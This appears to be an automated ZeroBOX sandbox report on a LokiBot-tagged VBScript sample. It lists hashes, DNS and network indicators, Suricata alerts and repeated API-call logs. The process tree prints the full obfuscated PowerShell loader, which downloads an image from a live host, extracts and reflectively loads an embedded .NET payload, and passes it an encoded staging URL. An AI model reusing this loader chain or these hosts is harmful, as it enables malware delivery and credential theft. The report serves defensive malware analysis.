popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

HTMLobject.vbs

LokiBot Generic Malware Antivirus PWS KeyLogger SMTP AntiDebug PowerShell AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 25, 2023, 1:16 p.m. Oct. 25, 2023, 1:18 p.m.
Size 325.7KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 74a3ea36669a5bdbeff3775545527a92
SHA256 b4f6b87e41f69f8f570148bab3fc32c6caa76c583d4f13e5a824ed87c9fbe585
CRC32 86704368
ssdeep 6144:SZSm81Zw+hmaIG5Xtu8mQwxymghmvDAQWjYuCSu1mQwNKgY3IVYe78tER8RjR3RV:SZSm81Zw+hmaIG5Xtu8mQwxymghmvDAg
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLobject.vbs

    2052

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVQByoUfwwBJMvGwoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBooUfwwBJMvHQoUfwwBJMvdoUfwwBJMvBwoUfwwBJMvHMoUfwwBJMvOgoUfwwBJMvvoUfwwBJMvC8oUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvHUoUfwwBJMvcoUfwwBJMvBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvC4oUfwwBJMvaQBvoUfwwBJMvC8oUfwwBJMvaQBioUfwwBJMvC8oUfwwBJMvdwBzoUfwwBJMvDgoUfwwBJMvTQBBoUfwwBJMvEooUfwwBJMvNgBloUfwwBJMvHoUfwwBJMvoUfwwBJMvdoUfwwBJMvBpoUfwwBJMvEwoUfwwBJMvZgBHoUfwwBJMvHUoUfwwBJMvXwoUfwwBJMvxoUfwwBJMvDYoUfwwBJMvOQoUfwwBJMv3oUfwwBJMvDcoUfwwBJMvMwoUfwwBJMv4oUfwwBJMvDQoUfwwBJMvOQoUfwwBJMvyoUfwwBJMvC4oUfwwBJMvagBwoUfwwBJMvGcoUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvdwBloUfwwBJMvGIoUfwwBJMvQwBsoUfwwBJMvGkoUfwwBJMvZQBuoUfwwBJMvHQoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvTgBloUfwwBJMvHcoUfwwBJMvLQBPoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvTgBloUfwwBJMvHQoUfwwBJMvLgBXoUfwwBJMvGUoUfwwBJMvYgBDoUfwwBJMvGwoUfwwBJMvaQBloUfwwBJMvG4oUfwwBJMvdoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvEIoUfwwBJMveQB0oUfwwBJMvGUoUfwwBJMvcwoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvHcoUfwwBJMvZQBioUfwwBJMvEMoUfwwBJMvboUfwwBJMvBpoUfwwBJMvGUoUfwwBJMvbgB0oUfwwBJMvC4oUfwwBJMvRoUfwwBJMvBvoUfwwBJMvHcoUfwwBJMvbgBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvEQoUfwwBJMvYQB0oUfwwBJMvGEoUfwwBJMvKoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBVoUfwwBJMvHIoUfwwBJMvboUfwwBJMvoUfwwBJMvpoUfwwBJMvDsoUfwwBJMvJoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvBboUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvVoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvdoUfwwBJMvoUfwwBJMvuoUfwwBJMvEUoUfwwBJMvbgBjoUfwwBJMvG8oUfwwBJMvZoUfwwBJMvBpoUfwwBJMvG4oUfwwBJMvZwBdoUfwwBJMvDooUfwwBJMvOgBVoUfwwBJMvFQoUfwwBJMvRgoUfwwBJMv4oUfwwBJMvC4oUfwwBJMvRwBloUfwwBJMvHQoUfwwBJMvUwB0oUfwwBJMvHIoUfwwBJMvaQBuoUfwwBJMvGcoUfwwBJMvKoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBCoUfwwBJMvHkoUfwwBJMvdoUfwwBJMvBloUfwwBJMvHMoUfwwBJMvKQoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwoUfwwBJMv8oUfwwBJMvDwoUfwwBJMvQgBBoUfwwBJMvFMoUfwwBJMvRQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvXwBToUfwwBJMvFQoUfwwBJMvQQBSoUfwwBJMvFQoUfwwBJMvPgoUfwwBJMv+oUfwwBJMvCcoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvGUoUfwwBJMvbgBkoUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwoUfwwBJMv8oUfwwBJMvDwoUfwwBJMvQgBBoUfwwBJMvFMoUfwwBJMvRQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvXwBFoUfwwBJMvE4oUfwwBJMvRoUfwwBJMvoUfwwBJMv+oUfwwBJMvD4oUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBUoUfwwBJMvGUoUfwwBJMveoUfwwBJMvB0oUfwwBJMvC4oUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvE8oUfwwBJMvZgoUfwwBJMvooUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvKQoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvZQBuoUfwwBJMvGQoUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvFQoUfwwBJMvZQB4oUfwwBJMvHQoUfwwBJMvLgBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvTwBmoUfwwBJMvCgoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBGoUfwwBJMvGwoUfwwBJMvYQBnoUfwwBJMvCkoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvHMoUfwwBJMvdoUfwwBJMvBhoUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvZQoUfwwBJMvgoUfwwBJMvDoUfwwBJMvoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvCsoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvLgBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvYgBhoUfwwBJMvHMoUfwwBJMvZQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvToUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZwB0oUfwwBJMvGgoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBzoUfwwBJMvHQo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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2160

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2272

Name Response Post-Analysis Lookup
apps.identrust.com
CNAME identrust.edgesuite.net
CNAME a1952.dscq.akamai.net
A 23.67.53.27
A 23.67.53.17
23.67.53.27
mail.egyptscientific.com
A 192.185.51.90
192.185.51.90
imageupload.io
A 104.21.83.102
A 172.67.222.26
172.67.222.26
api.ipify.org
A 173.231.16.77
A 64.185.227.156
CNAME api4.ipify.org
A 104.237.62.212
64.185.227.156
IP Address Status Action
104.21.83.102 Active Moloch
141.98.6.91 Active Moloch
164.124.101.2 Active Moloch
192.185.51.90 Active Moloch
23.67.53.27 Active Moloch
64.185.227.156 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 104.21.83.102:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:50800 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.185.51.90:587 -> 192.168.56.103:49172 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 192.185.51.90:587 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 141.98.6.91:80 -> 192.168.56.103:49167 2020423 ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 Exploit Kit Activity Detected
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 64.185.227.156:443 -> 192.168.56.103:49170 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49170 -> 64.185.227.156:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49170 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49166
104.21.83.102:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io 7f:d3:2d:a3:40:e0:de:64:4d:f5:a5:0f:96:b0:ae:07:58:85:a8:85
TLS 1.2
192.168.56.103:49172
192.185.51.90:587 		C=US, O=Let's Encrypt, CN=R3 CN=*.egyptscientific.com b0:5d:e4:ac:6c:e1:5c:a8:e4:6b:01:e8:16:48:c9:c7:47:b0:69:89

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: True
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
